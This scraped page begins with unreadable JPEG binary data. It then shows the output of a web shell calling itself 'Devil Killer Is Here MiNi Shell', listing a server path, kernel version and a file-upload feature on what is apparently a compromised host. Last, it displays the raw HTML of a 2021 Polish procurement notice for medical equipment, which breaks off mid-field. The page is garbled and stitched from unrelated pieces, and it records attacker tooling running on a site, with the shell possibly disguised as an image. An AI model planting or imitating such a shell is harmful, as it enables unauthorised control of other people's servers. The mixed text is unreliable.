JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210602/0007255401-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00072554 z dnia 2021-06-02</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu oraz wyposażenia medycznego na potrzeby realizacji projektu pn.: „Utworzenie COG w PCR im. dr J. Titz – Kosko w Sopocie Sp. z o.o.” dofinansowanego z EFRR, w podziale na 3 Pakiety </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Pomorskie Centrum Reumatologiczne im. dr Jadwigi Titz - Kosko w Sopocie Sp. z o. o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 192587795</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Grunwaldzka 1-3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sopot</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">81-759</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@pcrsopot.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pcrsopot.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Spółka prawa handlowego </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu oraz wyposażenia medycznego na potrzeby realizacji projektu pn.: „Utworzenie COG w PCR im. dr J. Titz – Kosko w Sopocie Sp. z o.o.” dofinansowanego z EFRR, w podziale na 3 Pakiety </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c1371ec8-c37f-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00072554</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> W Pak. nr 1-3 poz. 1 realizacja z udziałem środków unijnych na podst um nr UDA-RPPM.07.01.01-22-0001/17-00 ze zm, zawartej 13 .04.17 r. o dofinansowanie Projektu: Utworzenie COG w PCR im dr J. Titz – Kosko w Sopocie sp z o.o w ramach RPO Woj Pom na lata 2014–2020, Osi Priorytetowej 7 Zdrowie, Działania 7.1 Zasoby ochr. zdrowia, Poddziałania 7.1.1 Zasoby ochr. zdrowia - mech. ZIT współfin z EFRR </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pcr_sopot <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/pcr_sopot</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim przy użyciu środków komunikacji elektronicznej<br/>wformie elektronicznej za pośrednictwem platformazakupowa.pl (dalej jako „Platforma”) pod<br/>adresem:https://platformazakupowa.pl/pn/pcr_sopot tj. oferta oraz wszelkie dokumenty<br/>elektroniczne,oświadczenia, wnioski lub elektroniczne kopie dokumentów, oświadczeń lub wniosków, o<br/>których mowaw SWZ, składane są przez Wykonawcę za pośrednictwem bezpłatnej dla Wykonawców<br/>Platformy. 2Ofertę wraz z oświadczeniem o niepodleganiu wykluczeniu i spełnianiu warunków w<br/>postępowaniu,należy przesłać w formie elektronicznej podpisane elektronicznym podpisem zaufanym<br/>lub postacielektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym pod rygorem<br/>nieważnościpoprzez „Formularz” umieszczony na Platformie Zakupowej na stronie postępowania,<br/>gdzieWykonawca załącza ofertę wraz z załącznikami oraz ewentualnie dokumenty stanowiące<br/>tajemnicęprzedsiębiorstwa Zamawiający nie dopuszcza składania ofert z wykorzystaniem opcji<br/>„Wyślijwiadomość”. W przypadku awarii w działaniu Platformy:<br/>https://platformazakupowa.pl/pn/pcr_sopotZamawiający również dopuszcza komunikację za pomocą<br/>poczty elektronicznej (z wyłączeniemskładania oferty, dla której jedynym dopuszczalnym sposobem<br/>złożenia jest przesłanie jej zapośrednictwem Platformy). W takim przypadku Wykonawca zobowiązany<br/>jest przesłać dokumenty naadres: przetargi@pcrsopot.pl 3 Komunikacja między Zamawiającym, a<br/>wykonawcami, w tym wszelkieoświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane<br/>są w postaci elektronicznej zapośrednictwem Platformy i formularza „Wyślij wiadomość do<br/>zamawiającego”, przy czym dokumentyprzesłane przez Wykonawcę (w szczególności stanowiące<br/>oświadczenie woli) muszą być podpisaneelektronicznym podpisem kwalifikowanym, podpisem<br/>zaufanym lub podpisem osobistym przez osobęupoważnioną. Za datę przekazania (wpływu)<br/>oświadczeń, wniosków, zawiadomień oraz informacjiprzyjmuje się datę ich przesłania za<br/>pośrednictwem Platformy poprzez kliknięcie przycisku „Wyślijwiadomość do zamawiającego” po<br/>których pojawi się komunikat, że wiadomość została wysłana dozamawiającego. 4 Zamawiający będzie<br/>przekazywał wykonawcom informacje droga elektroniczną zapośrednictwem Platformy. Informacje<br/>dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmianyterminu składania i otwarcia ofert<br/>Zamawiający będzie zamieszczał na platformie w sekcji“Komunikaty”. Korespondencja, której zgodnie<br/>z obowiązującymi przepisami adresatem jest konkretnywykonawca, będzie przekazywana drogą elektroniczną za pośrednictwem Platformy do konkretnego wykonawcy. 5<br/>Zamawiający określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiającepracę na Platformie<br/>w dokumencie SWZ 6 Wykonawca, przystępując do niniejszego postępowania oudzielenie zamówienia<br/>publicznego:a) akceptuje warunki korzystania z platformazakupowa.plokreślone w Regulaminie<br/>zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin"oraz uznaje go za<br/>wiążący,b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnejpod linkiem:<br/>https://drive.google.com/file/d/1Kd1DttbBeiNWt4q4slS4t76lZVKPbkyD/view 7Zamawiający informuje,<br/>że instrukcje korzystania z Platformy dotyczące w szczególności logowania,składania wniosków o<br/>wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanychw niniejszym<br/>postępowaniu przy użyciu Platformy znajdują się w zakładce „Instrukcje dlaWykonawców" na stronie<br/>internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje8 Z uwagi na ograniczenie<br/>liczby znaków szczegółowe informacje znajdują się w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 13 ust. 1 i 2 rozporządzenia<br/>ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L<br/>119 z04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: a. Administratorem danych<br/>osobowychWykonawcy, a w wypadku Wykonawców będących osobami prawnymi lub<br/>jednostkamiorganizacyjnymi - w stosunku do danych osobowych zidentyfikowanych lub możliwych<br/>dozidentyfikowania osób fizycznych ujawnionych przez Wykonawcę jest Zamawiający -<br/>PomorskieCentrum Reumatologiczne im. dr Jadwigi Titz – Kosko w Sopocie Spółka z o.o. z siedzibą w<br/>Sopocie,ul. Grunwaldzka 1-3, 81-759 Sopot, wpisana do rejestru przedsiębiorców prowadzonego przez<br/>SądRejonowy Gdańsk – Północ w Gdańsku, Wydział VIII Gospodarczy Krajowego Rejestru Sądowego<br/>podnumerem KRS 0000684944, nr NIP 585-14-79-028, REGON: 192587795, tel. (58) 555-75-20,<br/>tel./fax.(58) 551-14-26.b. Administrator wyznaczył Inspektora Ochrony Danych, z którym można<br/>sięskontaktować pod adresem e-mail: iod@pcrsopot.pl lub na wskazany powyżej adres<br/>AdministratoraDanych Osobowych. Z Inspektorem Ochrony Danych Osobowych należy kontaktować<br/>się wewszystkich sprawach związanych z przetwarzaniem danych osobowych oraz z korzystaniem<br/>przezWykonawcę lub osoby, których dane osobowe zostały ujawnione przez Wykonawcę z<br/>prawzwiązanych z przetwarzaniem i ochroną danych osobowych. c. Dane osobowe Wykonawcy lub<br/>daneosobowe osób ujawnione przez Wykonawcę będą wykorzystywane w celu<br/>przeprowadzeniapostępowania i udzielenia zamówienia publicznego na podstawie przepisów ustawy<br/>Prawo zamówieńpublicznych, oraz po udzieleniu zamówienia w celu zawarcia i realizacji umowy.<br/>Podstawąprzetwarzania tych danych jest art. 6 ust. 1 pkt b), c) i f) RODO. d. Podanie danych<br/>osobowych jestdobrowolne, ale niezbędne do przeprowadzenia postępowania i udzielenia zamówienia<br/>publicznego napodstawie ustawy Prawo zamówień publicznych oraz realizacji umowy w przypadku jej<br/>zawarcia.Konsekwencją niepodania tych danych będzie niemożliwość przeprowadzenia postępowania<br/>oudzielenie zamówienia publicznego, a następnie podpisania oraz realizacji zawartej z<br/>Wykonawcąumowy i wynikających z niej obowiązków.e. Odbiorcami danych osobowych Wykonawcy<br/>lub danychosobowych osób ujawnionych przez Wykonawcę będą: Zamawiający, osoby lub podmioty,<br/>którymudostępniona zostanie dokumentacja postępowania w oparciu o art. 18 ustawy Prawo<br/>zamówieńpublicznych, podmioty uprawione do sprawdzania lub kontroli działalności Zamawiającego, w<br/>tymuczestniczące w postępowaniach przewidzianych w ramach środków ochrony prawnej<br/>opisanychustawie Prawo zamówień publicznych, a w przypadku zawarcia z Wykonawcą umowy<br/>odbiorcamidanych będą także podmioty świadczące obsługę prawną Zamawiającego, podmioty świadczące najego rzecz usługi finansowo-księgowe oraz inne podmioty upoważnione na podstawie<br/>przepisówprawa, zwłaszcza uprawione do kontroli działalności Zamawiającego.f. Zamawiający nie ma<br/>zamiaruprzekazywać danych osobowych Wykonawcy lub danych osobowych osób ujawnionych<br/>przezOgłoszenie nr 2021/BZP 00035299/01 z dnia 2021-04-192021-04-19 Biuletyn Zamówień<br/>Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na<br/>podstawie: art. 275 pkt 1 ustawy - DostawyWykonawcę do państwa trzeciego (poza teren<br/>Europejskiego Obszaru Gospodarczego) lub organizacji międzynarodowej, chyba że takie<br/>zobowiązanie będzie wynikać z przepisów prawa.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Dane osobowe Wykonawcy lub dane osobowe<br/>osóbujawnione przez Wykonawcę będą przetwarzane przez okres niezbędny do realizacji<br/>celuprzetwarzania w zakresie udzielenia zamówienia publicznego na podstawie ustawy Prawo<br/>zamówieńpublicznych oraz w przypadku zawarcia umowy przez okres realizacji umowy do momentu<br/>wygaśnięciaobowiązków przetwarzania danych wynikających z przepisów prawa, w tym wygaśnięcia<br/>roszczeń ocharakterze cywilnym i podatkowym. Następnie dane osobowe zostaną zarchiwizowane<br/>zgodnie zobowiązującymi przepisami prawa i przechowywane przez okres wymagany na podstawie<br/>przepisówokreślających postępowanie z materiałami archiwalnymi i inną dokumentacją. W<br/>przypadkuunieważnienia postępowania o udzielenie zamówienia publicznego dane osobowe<br/>Wykonawcy lubdane osobowe osób ujawnione przez Wykonawcę będą przetwarzane do momentu<br/>wygaśnięciaobowiązków przetwarzania danych wynikających z przepisów prawa, w tym przepisów<br/>dotyczącychokreślających postępowanie z materiałami archiwalnymi i inną dokumentacją.h. Dane<br/>osoboweWykonawcy lub dane osobowe osób ujawnione przez Wykonawcę nie będą przetwarzane w<br/>sposóbzautomatyzowany, w tym również w formie profilowania w rozumieniu art. 22 RODO.i.<br/>Wykonawca lubosoby, których dane osobowe zostały ujawnione przez Wykonawcę mają prawo<br/>dostępu do treściswoich danych osobowych oraz prawo ich sprostowania, ograniczenia ich<br/>przetwarzania, zzastrzeżeniem przepisów RODO, w tym art. 18 RODO, przenoszenia danych w<br/>przypadku gdy dane sąprzetwarzane na podstawie art. 6 ust. 1 pkt b) RODO, wniesienia sprzeciwu<br/>wobec przetwarzania wprzypadku gdy dane są przetwarzane na podstawie art. 6 ust. 1 pkt f) RODO<br/>oraz prawo do usunięciadanych osobowych z zastrzeżeniem art. 17 RODO.j. Wykonawca lub osoby,<br/>których dane osobowezostały ujawnione przez Wykonawcę mają prawo do wniesienia skargi do<br/>organu nadzorczego tj.:Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają, iż przetwarzanie<br/>danych osobowych ichdotyczących narusza przepisy RODO.k. Skorzystanie przez osobę, której dane<br/>osobowe dotyczą, zuprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16<br/>rozporządzenia 2016/679, niemoże skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>ani zmianą postanowieńumowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.l.<br/>W postępowaniu oudzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym<br/>mowa w art. 18 ust. 1rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia tego postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">7/TP/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET NR 1<br/>Lp.	Przedmiot zamówienia	Ilość (szt./zest)<br/>Zadanie 1	Ogrzewacz płynów	1<br/>Zadanie 2	Ogrzewacz pacjenta	1 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33100000-1 - Urządzenia medyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33162100-4 - Urządzenia używane na salach operacyjnych</p> <p class="mb-0">33168000-5 - Przyrządy do endoskopii, endochirurgii</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">95</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET NR 2<br/>Lp.	Przedmiot zamówienia	Ilość (szt.)<br/>1	Ssak jezdny	1 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33100000-1 - Urządzenia medyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33162100-4 - Urządzenia używane na salach operacyjnych</p> <p class="mb-0">33168000-5 - Przyrządy do endoskopii, endochirurgii</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">95</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> PAKIET NR 3<br/>Lp.	Przedmiot zamówienia	Ilość (szt.)<br/>1	Kolumna endoskopowa – tor wizyjny z wyposażeniem	1<br/>2	Dreny	2000 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33100000-1 - Urządzenia medyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33162100-4 - Urządzenia używane na salach operacyjnych</p> <p class="mb-0">33168000-5 - Przyrządy do endoskopii, endochirurgii</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">95</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres 